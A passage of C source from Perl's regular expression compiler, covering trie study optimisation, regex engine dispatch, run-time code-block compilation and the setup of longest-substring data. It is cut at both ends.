if (!(RExC_rx->intflags & PREGf_ANCH) && (flags & SCF_DO_SUBSTR))
RExC_rx->intflags |= PREGf_ANCH_GPOS;
if (RExC_rx->gofs < (STRLEN)min)
RExC_rx->gofs = min;
} else {
RExC_rx->intflags |= PREGf_GPOS_FLOAT;
RExC_rx->gofs = 0;
}
}
#ifdef TRIE_STUDY_OPT
#ifdef FULL_TRIE_STUDY
else if (PL_regkind[OP(scan)] == TRIE) {
/* NOTE - There is similar code to this block above for handling
BRANCH nodes on the initial study. If you change stuff here
check there too. */
regnode *trie_node= scan;
regnode *tail= regnext(scan);
reg_trie_data *trie = (reg_trie_data*)RExC_rxi->data->data[ ARG(scan) ];
SSize_t max1 = 0, min1 = SSize_t_MAX;
regnode_ssc accum;
if (flags & SCF_DO_SUBSTR) { /* XXXX Add !SUSPEND? */
/* Cannot merge strings after this. */
scan_commit(pRExC_state, data, minlenp, is_inf);
}
if (flags & SCF_DO_STCLASS)
ssc_init_zero(pRExC_state, &accum);
if (!trie->jump) {
min1= trie->minlen;
max1= trie->maxlen;
} else {
const regnode *nextbranch= NULL;
U32 word;
for ( word=1 ; word <= trie->wordcount ; word++)
{
SSize_t deltanext=0, minnext=0, f = 0, fake;
regnode_ssc this_class;
StructCopy(&zero_scan_data, &data_fake, scan_data_t);
if (data) {
data_fake.whilem_c = data->whilem_c;
data_fake.last_closep = data->last_closep;
}
else
data_fake.last_closep = &fake;
data_fake.pos_delta = delta;
if (flags & SCF_DO_STCLASS) {
ssc_init(pRExC_state, &this_class);
data_fake.start_class = &this_class;
f = SCF_DO_STCLASS_AND;
}
if (flags & SCF_WHILEM_VISITED_POS)
f |= SCF_WHILEM_VISITED_POS;
if (trie->jump[word]) {
if (!nextbranch)
nextbranch = trie_node + trie->jump[0];
scan= trie_node + trie->jump[word];
/* We go from the jump point to the branch that follows
it. Note this means we need the vestigal unused
branches even though they arent otherwise used. */
/* optimise study_chunk() for TRIE */
minnext = study_chunk(pRExC_state, &scan, minlenp,
&deltanext, (regnode *)nextbranch, &data_fake,
stopparen, recursed_depth, NULL, f, depth+1);
}
if (nextbranch && PL_regkind[OP(nextbranch)]==BRANCH)
nextbranch= regnext((regnode*)nextbranch);
if (min1 > (SSize_t)(minnext + trie->minlen))
min1 = minnext + trie->minlen;
if (deltanext == SSize_t_MAX) {
is_inf = is_inf_internal = 1;
max1 = SSize_t_MAX;
} else if (max1 < (SSize_t)(minnext + deltanext + trie->maxlen))
max1 = minnext + deltanext + trie->maxlen;
if (data_fake.flags & (SF_HAS_PAR|SF_IN_PAR))
pars++;
if (data_fake.flags & SCF_SEEN_ACCEPT) {
if ( stopmin > min + min1)
stopmin = min + min1;
flags &= ~SCF_DO_SUBSTR;
if (data)
data->flags |= SCF_SEEN_ACCEPT;
}
if (data) {
if (data_fake.flags & SF_HAS_EVAL)
data->flags |= SF_HAS_EVAL;
data->whilem_c = data_fake.whilem_c;
}
if (flags & SCF_DO_STCLASS)
ssc_or(pRExC_state, &accum, (regnode_charclass *) &this_class);
}
}
if (flags & SCF_DO_SUBSTR) {
data->pos_min += min1;
data->pos_delta += max1 - min1;
if (max1 != min1 || is_inf)
data->cur_is_floating = 1; /* float */
}
min += min1;
if (delta != SSize_t_MAX) {
if (SSize_t_MAX - (max1 - min1) >= delta)
delta += max1 - min1;
else
delta = SSize_t_MAX;
}
if (flags & SCF_DO_STCLASS_OR) {
ssc_or(pRExC_state, data->start_class, (regnode_charclass *) &accum);
if (min1) {
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) and_withp);
flags &= ~SCF_DO_STCLASS;
}
}
else if (flags & SCF_DO_STCLASS_AND) {
if (min1) {
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) &accum);
flags &= ~SCF_DO_STCLASS;
}
else {
/* Switch to OR mode: cache the old value of
* data->start_class */
INIT_AND_WITHP;
StructCopy(data->start_class, and_withp, regnode_ssc);
flags &= ~SCF_DO_STCLASS_AND;
StructCopy(&accum, data->start_class, regnode_ssc);
flags |= SCF_DO_STCLASS_OR;
}
}
scan= tail;
continue;
}
#else
else if (PL_regkind[OP(scan)] == TRIE) {
reg_trie_data *trie = (reg_trie_data*)RExC_rxi->data->data[ ARG(scan) ];
U8*bang=NULL;
min += trie->minlen;
delta += (trie->maxlen - trie->minlen);
flags &= ~SCF_DO_STCLASS; /* xxx */
if (flags & SCF_DO_SUBSTR) {
/* Cannot expect anything... */
scan_commit(pRExC_state, data, minlenp, is_inf);
data->pos_min += trie->minlen;
data->pos_delta += (trie->maxlen - trie->minlen);
if (trie->maxlen != trie->minlen)
data->cur_is_floating = 1; /* float */
}
if (trie->jump) /* no more substrings -- for now /grr*/
flags &= ~SCF_DO_SUBSTR;
}
#endif /* old or new */
#endif /* TRIE_STUDY_OPT */
/* Else: zero-length, ignore. */
scan = regnext(scan);
}
finish:
if (frame) {
/* we need to unwind recursion. */
depth = depth - 1;
DEBUG_STUDYDATA("frame-end", data, depth, is_inf);
DEBUG_PEEP("fend", scan, depth, flags);
/* restore previous context */
last = frame->last_regnode;
scan = frame->next_regnode;
stopparen = frame->stopparen;
recursed_depth = frame->prev_recursed_depth;
RExC_frame_last = frame->prev_frame;
frame = frame->this_prev_frame;
goto fake_study_recurse;
}
assert(!frame);
DEBUG_STUDYDATA("pre-fin", data, depth, is_inf);
*scanp = scan;
*deltap = is_inf_internal ? SSize_t_MAX : delta;
if (flags & SCF_DO_SUBSTR && is_inf)
data->pos_delta = SSize_t_MAX - data->pos_min;
if (is_par > (I32)U8_MAX)
is_par = 0;
if (is_par && pars==1 && data) {
data->flags |= SF_IN_PAR;
data->flags &= ~SF_HAS_PAR;
}
else if (pars && data) {
data->flags |= SF_HAS_PAR;
data->flags &= ~SF_IN_PAR;
}
if (flags & SCF_DO_STCLASS_OR)
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) and_withp);
if (flags & SCF_TRIE_RESTUDY)
data->flags |= SCF_TRIE_RESTUDY;
DEBUG_STUDYDATA("post-fin", data, depth, is_inf);
{
SSize_t final_minlen= min < stopmin ? min : stopmin;
if (!(RExC_seen & REG_UNBOUNDED_QUANTIFIER_SEEN)) {
if (final_minlen > SSize_t_MAX - delta)
RExC_maxlen = SSize_t_MAX;
else if (RExC_maxlen < final_minlen + delta)
RExC_maxlen = final_minlen + delta;
}
return final_minlen;
}
NOT_REACHED; /* NOTREACHED */
}
STATIC U32
S_add_data(RExC_state_t* const pRExC_state, const char* const s, const U32 n)
{
U32 count = RExC_rxi->data ? RExC_rxi->data->count : 0;
PERL_ARGS_ASSERT_ADD_DATA;
Renewc(RExC_rxi->data,
sizeof(*RExC_rxi->data) + sizeof(void*) * (count + n - 1),
char, struct reg_data);
if(count)
Renew(RExC_rxi->data->what, count + n, U8);
else
Newx(RExC_rxi->data->what, n, U8);
RExC_rxi->data->count = count + n;
Copy(s, RExC_rxi->data->what + count, n, U8);
return count;
}
/*XXX: todo make this not included in a non debugging perl, but appears to be
* used anyway there, in 'use re' */
#ifndef PERL_IN_XSUB_RE
void
Perl_reginitcolors(pTHX)
{
const char * const s = PerlEnv_getenv("PERL_RE_COLORS");
if (s) {
char *t = savepv(s);
int i = 0;
PL_colors[0] = t;
while (++i < 6) {
t = strchr(t, '\t');
if (t) {
*t = '\0';
PL_colors[i] = ++t;
}
else
PL_colors[i] = t = (char *)"";
}
} else {
int i = 0;
while (i < 6)
PL_colors[i++] = (char *)"";
}
PL_colorset = 1;
}
#endif
#ifdef TRIE_STUDY_OPT
#define CHECK_RESTUDY_GOTO_butfirst(dOsomething) \
STMT_START { \
if ( \
(data.flags & SCF_TRIE_RESTUDY) \
&& ! restudied++ \
) { \
dOsomething; \
goto reStudy; \
} \
} STMT_END
#else
#define CHECK_RESTUDY_GOTO_butfirst
#endif
/*
* pregcomp - compile a regular expression into internal code
*
* Decides which engine's compiler to call based on the hint currently in
* scope
*/
#ifndef PERL_IN_XSUB_RE
/* return the currently in-scope regex engine (or the default if none) */
regexp_engine const *
Perl_current_re_engine(pTHX)
{
if (IN_PERL_COMPILETIME) {
HV * const table = GvHV(PL_hintgv);
SV **ptr;
if (!table || !(PL_hints & HINT_LOCALIZE_HH))
return &PL_core_reg_engine;
ptr = hv_fetchs(table, "regcomp", FALSE);
if ( !(ptr && SvIOK(*ptr) && SvIV(*ptr)))
return &PL_core_reg_engine;
return INT2PTR(regexp_engine*, SvIV(*ptr));
}
else {
SV *ptr;
if (!PL_curcop->cop_hints_hash)
return &PL_core_reg_engine;
ptr = cop_hints_fetch_pvs(PL_curcop, "regcomp", 0);
if ( !(ptr && SvIOK(ptr) && SvIV(ptr)))
return &PL_core_reg_engine;
return INT2PTR(regexp_engine*, SvIV(ptr));
}
}
REGEXP *
Perl_pregcomp(pTHX_ SV * const pattern, const U32 flags)
{
regexp_engine const *eng = current_re_engine();
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_PREGCOMP;
/* Dispatch a request to compile a regexp to correct regexp engine. */
DEBUG_COMPILE_r({
Perl_re_printf( aTHX_ "Using engine %" UVxf "\n",
PTR2UV(eng));
});
return CALLREGCOMP_ENG(eng, pattern, flags);
}
#endif
/* public(ish) entry point for the perl core's own regex compiling code.
* It's actually a wrapper for Perl_re_op_compile that only takes an SV
* pattern rather than a list of OPs, and uses the internal engine rather
* than the current one */
REGEXP *
Perl_re_compile(pTHX_ SV * const pattern, U32 rx_flags)
{
SV *pat = pattern; /* defeat constness! */
PERL_ARGS_ASSERT_RE_COMPILE;
return Perl_re_op_compile(aTHX_ &pat, 1, NULL,
#ifdef PERL_IN_XSUB_RE
&my_reg_engine,
#else
&PL_core_reg_engine,
#endif
NULL, NULL, rx_flags, 0);
}
static void
S_free_codeblocks(pTHX_ struct reg_code_blocks *cbs)
{
int n;
if (--cbs->refcnt > 0)
return;
for (n = 0; n < cbs->count; n++) {
REGEXP *rx = cbs->cb[n].src_regex;
if (rx) {
cbs->cb[n].src_regex = NULL;
SvREFCNT_dec_NN(rx);
}
}
Safefree(cbs->cb);
Safefree(cbs);
}
static struct reg_code_blocks *
S_alloc_code_blocks(pTHX_ int ncode)
{
struct reg_code_blocks *cbs;
Newx(cbs, 1, struct reg_code_blocks);
cbs->count = ncode;
cbs->refcnt = 1;
SAVEDESTRUCTOR_X(S_free_codeblocks, cbs);
if (ncode)
Newx(cbs->cb, ncode, struct reg_code_block);
else
cbs->cb = NULL;
return cbs;
}
/* upgrade pattern pat_p of length plen_p to UTF8, and if there are code
* blocks, recalculate the indices. Update pat_p and plen_p in-place to
* point to the realloced string and length.
*
* This is essentially a copy of Perl_bytes_to_utf8() with the code index
* stuff added */
static void
S_pat_upgrade_to_utf8(pTHX_ RExC_state_t * const pRExC_state,
char **pat_p, STRLEN *plen_p, int num_code_blocks)
{
U8 *const src = (U8*)*pat_p;
U8 *dst, *d;
int n=0;
STRLEN s = 0;
bool do_end = 0;
GET_RE_DEBUG_FLAGS_DECL;
DEBUG_PARSE_r(Perl_re_printf( aTHX_
"UTF8 mismatch! Converting to utf8 for resizing and compile\n"));
/* 1 for each byte + 1 for each byte that expands to two, + trailing NUL */
Newx(dst, *plen_p + variant_under_utf8_count(src, src + *plen_p) + 1, U8);
d = dst;
while (s < *plen_p) {
append_utf8_from_native_byte(src[s], &d);
if (n < num_code_blocks) {
assert(pRExC_state->code_blocks);
if (!do_end && pRExC_state->code_blocks->cb[n].start == s) {
pRExC_state->code_blocks->cb[n].start = d - dst - 1;
assert(*(d - 1) == '(');
do_end = 1;
}
else if (do_end && pRExC_state->code_blocks->cb[n].end == s) {
pRExC_state->code_blocks->cb[n].end = d - dst - 1;
assert(*(d - 1) == ')');
do_end = 0;
n++;
}
}
s++;
}
*d = '\0';
*plen_p = d - dst;
*pat_p = (char*) dst;
SAVEFREEPV(*pat_p);
RExC_orig_utf8 = RExC_utf8 = 1;
}
/* S_concat_pat(): concatenate a list of args to the pattern string pat,
* while recording any code block indices, and handling overloading,
* nested qr// objects etc. If pat is null, it will allocate a new
* string, or just return the first arg, if there's only one.
*
* Returns the malloced/updated pat.
* patternp and pat_count is the array of SVs to be concatted;
* oplist is the optional list of ops that generated the SVs;
* recompile_p is a pointer to a boolean that will be set if
* the regex will need to be recompiled.
* delim, if non-null is an SV that will be inserted between each element
*/
static SV*
S_concat_pat(pTHX_ RExC_state_t * const pRExC_state,
SV *pat, SV ** const patternp, int pat_count,
OP *oplist, bool *recompile_p, SV *delim)
{
SV **svp;
int n = 0;
bool use_delim = FALSE;
bool alloced = FALSE;
/* if we know we have at least two args, create an empty string,
* then concatenate args to that. For no args, return an empty string */
if (!pat && pat_count != 1) {
pat = newSVpvs("");
SAVEFREESV(pat);
alloced = TRUE;
}
for (svp = patternp; svp < patternp + pat_count; svp++) {
SV *sv;
SV *rx = NULL;
STRLEN orig_patlen = 0;
bool code = 0;
SV *msv = use_delim ? delim : *svp;
if (!msv) msv = &PL_sv_undef;
/* if we've got a delimiter, we go round the loop twice for each
* svp slot (except the last), using the delimiter the second
* time round */
if (use_delim) {
svp--;
use_delim = FALSE;
}
else if (delim)
use_delim = TRUE;
if (SvTYPE(msv) == SVt_PVAV) {
/* we've encountered an interpolated array within
* the pattern, e.g. /...@a..../. Expand the list of elements,
* then recursively append elements.
* The code in this block is based on S_pushav() */
AV *const av = (AV*)msv;
const SSize_t maxarg = AvFILL(av) + 1;
SV **array;
if (oplist) {
assert(oplist->op_type == OP_PADAV
|| oplist->op_type == OP_RV2AV);
oplist = OpSIBLING(oplist);
}
if (SvRMAGICAL(av)) {
SSize_t i;
Newx(array, maxarg, SV*);
SAVEFREEPV(array);
for (i=0; i < maxarg; i++) {
SV ** const svp = av_fetch(av, i, FALSE);
array[i] = svp ? *svp : &PL_sv_undef;
}
}
else
array = AvARRAY(av);
pat = S_concat_pat(aTHX_ pRExC_state, pat,
array, maxarg, NULL, recompile_p,
/* $" */
GvSV((gv_fetchpvs("\"", GV_ADDMULTI, SVt_PV))));
continue;
}
/* we make the assumption here that each op in the list of
* op_siblings maps to one SV pushed onto the stack,
* except for code blocks, with have both an OP_NULL and
* and OP_CONST.
* This allows us to match up the list of SVs against the
* list of OPs to find the next code block.
*
* Note that PUSHMARK PADSV PADSV ..
* is optimised to
* PADRANGE PADSV PADSV ..
* so the alignment still works. */
if (oplist) {
if (oplist->op_type == OP_NULL
&& (oplist->op_flags & OPf_SPECIAL))
{
assert(n < pRExC_state->code_blocks->count);
pRExC_state->code_blocks->cb[n].start = pat ? SvCUR(pat) : 0;
pRExC_state->code_blocks->cb[n].block = oplist;
pRExC_state->code_blocks->cb[n].src_regex = NULL;
n++;
code = 1;
oplist = OpSIBLING(oplist); /* skip CONST */
assert(oplist);
}
oplist = OpSIBLING(oplist);;
}
/* apply magic and QR overloading to arg */
SvGETMAGIC(msv);
if (SvROK(msv) && SvAMAGIC(msv)) {
SV *sv = AMG_CALLunary(msv, regexp_amg);
if (sv) {
if (SvROK(sv))
sv = SvRV(sv);
if (SvTYPE(sv) != SVt_REGEXP)
Perl_croak(aTHX_ "Overloaded qr did not return a REGEXP");
msv = sv;
}
}
/* try concatenation overload ... */
if (pat && (SvAMAGIC(pat) || SvAMAGIC(msv)) &&
(sv = amagic_call(pat, msv, concat_amg, AMGf_assign)))
{
sv_setsv(pat, sv);
/* overloading involved: all bets are off over literal
* code. Pretend we haven't seen it */
if (n)
pRExC_state->code_blocks->count -= n;
n = 0;
}
else {
/* ... or failing that, try "" overload */
while (SvAMAGIC(msv)
&& (sv = AMG_CALLunary(msv, string_amg))
&& sv != msv
&& !( SvROK(msv)
&& SvROK(sv)
&& SvRV(msv) == SvRV(sv))
) {
msv = sv;
SvGETMAGIC(msv);
}
if (SvROK(msv) && SvTYPE(SvRV(msv)) == SVt_REGEXP)
msv = SvRV(msv);
if (pat) {
/* this is a partially unrolled
* sv_catsv_nomg(pat, msv);
* that allows us to adjust code block indices if
* needed */
STRLEN dlen;
char *dst = SvPV_force_nomg(pat, dlen);
orig_patlen = dlen;
if (SvUTF8(msv) && !SvUTF8(pat)) {
S_pat_upgrade_to_utf8(aTHX_ pRExC_state, &dst, &dlen, n);
sv_setpvn(pat, dst, dlen);
SvUTF8_on(pat);
}
sv_catsv_nomg(pat, msv);
rx = msv;
}
else {
/* We have only one SV to process, but we need to verify
* it is properly null terminated or we will fail asserts
* later. In theory we probably shouldn't get such SV's,
* but if we do we should handle it gracefully. */
if ( SvTYPE(msv) != SVt_PV || (SvLEN(msv) > SvCUR(msv) && *(SvEND(msv)) == 0) || SvIsCOW_shared_hash(msv) ) {
/* not a string, or a string with a trailing null */
pat = msv;
} else {
/* a string with no trailing null, we need to copy it
* so it has a trailing null */
pat = sv_2mortal(newSVsv(msv));
}
}
if (code)
pRExC_state->code_blocks->cb[n-1].end = SvCUR(pat)-1;
}
/* extract any code blocks within any embedded qr//'s */
if (rx && SvTYPE(rx) == SVt_REGEXP
&& RX_ENGINE((REGEXP*)rx)->op_comp)
{
RXi_GET_DECL(ReANY((REGEXP *)rx), ri);
if (ri->code_blocks && ri->code_blocks->count) {
int i;
/* the presence of an embedded qr// with code means
* we should always recompile: the text of the
* qr// may not have changed, but it may be a
* different closure than last time */
*recompile_p = 1;
if (pRExC_state->code_blocks) {
int new_count = pRExC_state->code_blocks->count
+ ri->code_blocks->count;
Renew(pRExC_state->code_blocks->cb,
new_count, struct reg_code_block);
pRExC_state->code_blocks->count = new_count;
}
else
pRExC_state->code_blocks = S_alloc_code_blocks(aTHX_
ri->code_blocks->count);
for (i=0; i < ri->code_blocks->count; i++) {
struct reg_code_block *src, *dst;
STRLEN offset = orig_patlen
+ ReANY((REGEXP *)rx)->pre_prefix;
assert(n < pRExC_state->code_blocks->count);
src = &ri->code_blocks->cb[i];
dst = &pRExC_state->code_blocks->cb[n];
dst->start = src->start + offset;
dst->end = src->end + offset;
dst->block = src->block;
dst->src_regex = (REGEXP*) SvREFCNT_inc( (SV*)
src->src_regex
? src->src_regex
: (REGEXP*)rx);
n++;
}
}
}
}
/* avoid calling magic multiple times on a single element e.g. =~ $qr */
if (alloced)
SvSETMAGIC(pat);
return pat;
}
/* see if there are any run-time code blocks in the pattern.
* False positives are allowed */
static bool
S_has_runtime_code(pTHX_ RExC_state_t * const pRExC_state,
char *pat, STRLEN plen)
{
int n = 0;
STRLEN s;
PERL_UNUSED_CONTEXT;
for (s = 0; s < plen; s++) {
if ( pRExC_state->code_blocks
&& n < pRExC_state->code_blocks->count
&& s == pRExC_state->code_blocks->cb[n].start)
{
s = pRExC_state->code_blocks->cb[n].end;
n++;
continue;
}
/* TODO ideally should handle [..], (#..), /#.../x to reduce false
* positives here */
if (pat[s] == '(' && s+2 <= plen && pat[s+1] == '?' &&
(pat[s+2] == '{'
|| (s + 2 <= plen && pat[s+2] == '?' && pat[s+3] == '{'))
)
return 1;
}
return 0;
}
/* Handle run-time code blocks. We will already have compiled any direct
* or indirect literal code blocks. Now, take the pattern 'pat' and make a
* copy of it, but with any literal code blocks blanked out and
* appropriate chars escaped; then feed it into
*
* eval "qr'modified_pattern'"
*
* For example,
*
* a\bc(?{"this was literal"})def'ghi\\jkl(?{"this is runtime"})mno
*
* becomes
*
* qr'a\\bc_______________________def\'ghi\\\\jkl(?{"this is runtime"})mno'
*
* After eval_sv()-ing that, grab any new code blocks from the returned qr
* and merge them with any code blocks of the original regexp.
*
* If the pat is non-UTF8, while the evalled qr is UTF8, don't merge;
* instead, just save the qr and return FALSE; this tells our caller that
* the original pattern needs upgrading to utf8.
*/
static bool
S_compile_runtime_code(pTHX_ RExC_state_t * const pRExC_state,
char *pat, STRLEN plen)
{
SV *qr;
GET_RE_DEBUG_FLAGS_DECL;
if (pRExC_state->runtime_code_qr) {
/* this is the second time we've been called; this should
* only happen if the main pattern got upgraded to utf8
* during compilation; re-use the qr we compiled first time
* round (which should be utf8 too)
*/
qr = pRExC_state->runtime_code_qr;
pRExC_state->runtime_code_qr = NULL;
assert(RExC_utf8 && SvUTF8(qr));
}
else {
int n = 0;
STRLEN s;
char *p, *newpat;
int newlen = plen + 7; /* allow for "qr''xx\0" extra chars */
SV *sv, *qr_ref;
dSP;
/* determine how many extra chars we need for ' and \ escaping */
for (s = 0; s < plen; s++) {
if (pat[s] == '\'' || pat[s] == '\\')
newlen++;
}
Newx(newpat, newlen, char);
p = newpat;
*p++ = 'q'; *p++ = 'r'; *p++ = '\'';
for (s = 0; s < plen; s++) {
if ( pRExC_state->code_blocks
&& n < pRExC_state->code_blocks->count
&& s == pRExC_state->code_blocks->cb[n].start)
{
/* blank out literal code block so that they aren't
* recompiled: eg change from/to:
* /(?{xyz})/
* /(?=====)/
* and
* /(??{xyz})/
* /(?======)/
* and
* /(?(?{xyz}))/
* /(?(?=====))/
*/
assert(pat[s] == '(');
assert(pat[s+1] == '?');
*p++ = '(';
*p++ = '?';
s += 2;
while (s < pRExC_state->code_blocks->cb[n].end) {
*p++ = '=';
s++;
}
*p++ = ')';
n++;
continue;
}
if (pat[s] == '\'' || pat[s] == '\\')
*p++ = '\\';
*p++ = pat[s];
}
*p++ = '\'';
if (pRExC_state->pm_flags & RXf_PMf_EXTENDED) {
*p++ = 'x';
if (pRExC_state->pm_flags & RXf_PMf_EXTENDED_MORE) {
*p++ = 'x';
}
}
*p++ = '\0';
DEBUG_COMPILE_r({
Perl_re_printf( aTHX_
"%sre-parsing pattern for runtime code:%s %s\n",
PL_colors[4], PL_colors[5], newpat);
});
sv = newSVpvn_flags(newpat, p-newpat-1, RExC_utf8 ? SVf_UTF8 : 0);
Safefree(newpat);
ENTER;
SAVETMPS;
save_re_context();
PUSHSTACKi(PERLSI_REQUIRE);
/* G_RE_REPARSING causes the toker to collapse \\ into \ when
* parsing qr''; normally only q'' does this. It also alters
* hints handling */
eval_sv(sv, G_SCALAR|G_RE_REPARSING);
SvREFCNT_dec_NN(sv);
SPAGAIN;
qr_ref = POPs;
PUTBACK;
{
SV * const errsv = ERRSV;
if (SvTRUE_NN(errsv))
/* use croak_sv ? */
Perl_croak_nocontext("%" SVf, SVfARG(errsv));
}
assert(SvROK(qr_ref));
qr = SvRV(qr_ref);
assert(SvTYPE(qr) == SVt_REGEXP && RX_ENGINE((REGEXP*)qr)->op_comp);
/* the leaving below frees the tmp qr_ref.
* Give qr a life of its own */
SvREFCNT_inc(qr);
POPSTACK;
FREETMPS;
LEAVE;
}
if (!RExC_utf8 && SvUTF8(qr)) {
/* first time through; the pattern got upgraded; save the
* qr for the next time through */
assert(!pRExC_state->runtime_code_qr);
pRExC_state->runtime_code_qr = qr;
return 0;
}
/* extract any code blocks within the returned qr// */
/* merge the main (r1) and run-time (r2) code blocks into one */
{
RXi_GET_DECL(ReANY((REGEXP *)qr), r2);
struct reg_code_block *new_block, *dst;
RExC_state_t * const r1 = pRExC_state; /* convenient alias */
int i1 = 0, i2 = 0;
int r1c, r2c;
if (!r2->code_blocks || !r2->code_blocks->count) /* we guessed wrong */
{
SvREFCNT_dec_NN(qr);
return 1;
}
if (!r1->code_blocks)
r1->code_blocks = S_alloc_code_blocks(aTHX_ 0);
r1c = r1->code_blocks->count;
r2c = r2->code_blocks->count;
Newx(new_block, r1c + r2c, struct reg_code_block);
dst = new_block;
while (i1 < r1c || i2 < r2c) {
struct reg_code_block *src;
bool is_qr = 0;
if (i1 == r1c) {
src = &r2->code_blocks->cb[i2++];
is_qr = 1;
}
else if (i2 == r2c)
src = &r1->code_blocks->cb[i1++];
else if ( r1->code_blocks->cb[i1].start
< r2->code_blocks->cb[i2].start)
{
src = &r1->code_blocks->cb[i1++];
assert(src->end < r2->code_blocks->cb[i2].start);
}
else {
assert( r1->code_blocks->cb[i1].start
> r2->code_blocks->cb[i2].start);
src = &r2->code_blocks->cb[i2++];
is_qr = 1;
assert(src->end < r1->code_blocks->cb[i1].start);
}
assert(pat[src->start] == '(');
assert(pat[src->end] == ')');
dst->start = src->start;
dst->end = src->end;
dst->block = src->block;
dst->src_regex = is_qr ? (REGEXP*) SvREFCNT_inc( (SV*) qr)
: src->src_regex;
dst++;
}
r1->code_blocks->count += r2c;
Safefree(r1->code_blocks->cb);
r1->code_blocks->cb = new_block;
}
SvREFCNT_dec_NN(qr);
return 1;
}
STATIC bool
S_setup_longest(pTHX_ RExC_state_t *pRExC_state,
struct reg_substr_datum *rsd,
struct scan_data_substrs *sub,
STRLEN longest_length)
{
/* This is the common code for setting up the floating and fixed length
* string data extracted from Perl_re_op_compile() below. Returns a boolean
* as to whether succeeded or not */
I32 t;
SSize_t ml;
bool eol = cBOOL(sub->flags & SF_BEFORE_EOL);
bool meol = cBOOL(sub->flags & SF_BEFORE_MEOL);
if (! (longest_length
|| (eol /* Can't have SEOL and MULTI */
&& (! meol || (RExC_flags & RXf_PMf_MULTILINE)))
)
/* See comments for join_exact for why REG_UNFOLDED_MULTI_SEEN */
|| (RExC_seen & REG_UNFOLDED_MULTI_SEEN))
{
return FALSE;
}
/* copy the information about the longest from the reg_scan_data
over to the program. */
if (SvUTF8(sub->str)) {
rsd->substr = NULL;
rsd->utf8_substr = sub->str;
} else {
rsd->substr = sub->str;
rsd->utf8_substr = NULL;
}
/* end_shift is how many chars that must be matched that
follow this item. We calculate it ahead of time as once the
lookbehind offset is added in we lose the ability to correctly
calculate it.*/
ml = sub->minlenp ? *(sub->minlenp) : (SSize_t)longest_length;
rsd->end_shift = ml - sub->min_offset
- longest_length
/* XXX SvTAIL is always false here - did you mean FBMcf_TAIL
* intead? - DAPM
+ (SvTAIL(sub->str) != 0)
*/
+ sub->lookbehind;
t = (eol/* Can't have SEOL and MULTI */
&& (! meol || (RExC_flags & RXf_PMf_MULTILINE)));
fbm_compile(sub->str, t ? FBMcf_TAIL : 0);
return TRUE;
}
STATIC void
S_set_regex_pv(pTHX_ RExC_state_t *pRExC_state, REGEXP *Rx)
{
/* Calculates and sets in the compiled pattern 'Rx' the string to compile,
* properly wrapped with the right modifiers */
bool has_p = ((RExC_rx->extflags & RXf_PMf_KEEPCOPY) == RXf_PMf_KEEPCOPY);
bool has_charset = RExC_utf8 || (get_regex_charset(RExC_rx->extflags)
!= REGEX_DEPENDS_CHARSET);
/* The caret is output if there are any defaults: if not all the STD
* flags are set, or if no character set specifier is needed */
bool has_default =
(((RExC_rx->extflags & RXf_PMf_STD_PMMOD) != RXf_PMf_STD_PMMOD)
|| ! has_charset);
bool has_runon = ((RExC_seen & REG_RUN_ON_COMMENT_SEEN)
== REG_RUN_ON_COMMENT_SEEN);
U8 reganch = (U8)((RExC_rx->extflags & RXf_PMf_STD_PMMOD)
>> RXf_PMf_STD_PMMOD_SHIFT);
const char *fptr = STD_PAT_MODS; /*"msixxn"*/
char *p;
STRLEN pat_len = RExC_precomp_end - RExC_precomp;
/* We output all the necessary flags; we never output a minus, as all
* those are defaults, so are
* covered by the caret */
const STRLEN wraplen = pat_len + has_p + has_runon
+ has_default /* If needs a caret */
+ PL_bitcount[reganch] /* 1 char for each set standard flag */
/* If needs a character set specifier */
+ ((has_charset) ? MAX_CHARSET_NAME_LENGTH : 0)
+ (sizeof("(?:)") - 1);
PERL_ARGS_ASSERT_SET_REGEX_PV;
/* make sure PL_bitcount bounds not exceeded */
assert(sizeof(STD_PAT_MODS) <= 8);
p = sv_grow(MUTABLE_SV(Rx), wraplen + 1); /* +1 for the ending NUL */
SvPOK_on(Rx);
if (RExC_utf8)
SvFLAGS(Rx) |= SVf_UTF8;
*p++='('; *p++='?';
/* If a default, cover it using the caret */
if (has_default) {
*p++= DEFAULT_PAT_MOD;
}
if (has_charset) {
STRLEN len;
const char* name;
name = get_regex_charset_name(RExC_rx->extflags, &len);
if strEQ(name, DEPENDS_PAT_MODS) { /* /d under UTF-8 => /u */
assert(RExC_utf8);
name = UNICODE_PAT_MODS;
len = sizeof(UNICODE_PAT_MODS) - 1;
}
Copy(name, p, len, char);
p += len;
}
if (has_p)
*p++ = KEEPCOPY_PAT_MOD; /*'p'*/
{
char ch;
while((ch = *fptr++)) {
if(reganch & 1)
*p++ = ch;
reganch >>= 1;
}
}
*p++ = ':';
Copy(RExC_precomp, p, pat_len, char);
assert ((RX_WRAPPED(Rx) - p) < 16);
RExC_rx->pre_prefix = p - RX_WRAPPED(Rx);
p += pat_len;
/* Adding a trailing \n causes this to compile properly:
my $R = qr / A B C # D E/x; /($R)/
Otherwise the parens are considered part of the comment */
if (has_runon)
*p++ = '\n';
*p++ = ')';
*p = 0;
SvCUR_set(Rx, p - RX_WRAPPED(Rx));
}
/*
* Perl_re_op_compile - the perl internal RE engine's function to compile a
* regular expression into internal code.
* The pattern may be passed either as:
* a list of SVs (patternp plus pat_count)
* a list of OPs (expr)
* If both are passed, the SV list is used, but the OP list indicates
* which SVs are actually pre-compiled code blocks
*
* The SVs in the list have magic and qr overloading applied to them (and
* the list may be modified in-place with replacement SVs in the latter
* case).
*
* If the pattern hasn't changed from old_re, then old_re will be
* returned.
*
* eng is the current engine. If that engine has an op_comp method, then
* handle directly (i.e. we assume that op_comp was us); otherwise, just
* do the initial concatenation of arguments and pass on to the external
* engine.
*
* If is_bare_re is not null, set it to a boolean indicating whether the
* arg list reduced (after overloading) to a single bare regex which has
* been returned (i.e. /$qr/).
*
* orig_rx_flags contains RXf_* flags. See perlreapi.pod for more details.
*
* pm_flags contains the PMf_* flags, typically based on those from the
* pm_flags field of the related PMOP. Currently we're only interested in
* PMf_HAS_CV, PMf_IS_QR, PMf_USE_RE_EVAL.
*
* For many years this code had an initial sizing pass that calculated
* (sometimes incorrectly, leading to security holes) the size needed for the
* compiled pattern. That was changed by commit
* 7c932d07cab18751bfc7515b4320436273a459e2 in 5.29, which reallocs the size, a
* node at a time, as parsing goes along. Patches welcome to fix any obsolete
* references to this sizing pass.
*
